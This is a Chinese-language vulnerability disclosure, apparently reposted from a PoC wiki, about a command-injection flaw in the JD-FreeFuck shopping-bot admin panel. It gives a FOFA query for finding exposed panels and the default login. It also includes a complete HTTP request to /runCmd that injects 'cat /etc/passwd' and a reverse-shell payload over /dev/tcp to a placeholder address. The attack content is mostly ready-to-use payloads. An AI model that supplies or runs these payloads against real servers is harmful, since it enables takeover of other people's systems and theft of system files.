JD-FreeFuck 后台命令执行漏洞

admin 2021年3月30日03:22:09评论886 views字数 1169阅读3分53秒阅读模式

JD-FreeFuck 后台命令执行漏洞



:漏洞描述🐑


JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器

项目地址:https://github.com/meselson/JD-FreeFuck


二:  漏洞影响🐇


JD-FreeFuck


三:  漏洞复现🐋


FOFA: title="京东薅羊毛控制面板"


访问后登录页面如下

JD-FreeFuck 后台命令执行漏洞




默认账号密码为useradmin/supermanito


JD-FreeFuck 后台命令执行漏洞


发送如下请求包执行命令

POST /runCmd HTTP/1.1Host: 101.200.189.251:5678Content-Length: 50Pragma: no-cacheCache-Control: no-cacheAccept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7UConnection: close
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

其中 cmd 参数存在命令注入

JD-FreeFuck 后台命令执行漏洞

反弹shell

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500

JD-FreeFuck 后台命令执行漏洞



 四:  参考文章🦉

@桃花心 师傅

https://www.secquan.org/Discuss/1071932#reply3


 五:  关于文库🦉



在线文库:

http://wiki.peiqi.tech


Github:

https://github.com/PeiQi0/PeiQi-WIKI-POC


最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

投稿的师傅联系私聊我~






本文始发于微信公众号(PeiQi文库):JD-FreeFuck 后台命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月30日03:22:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JD-FreeFuck 后台命令执行漏洞https://cn-sec.com/archives/312120.html

发表评论

匿名网友 填写信息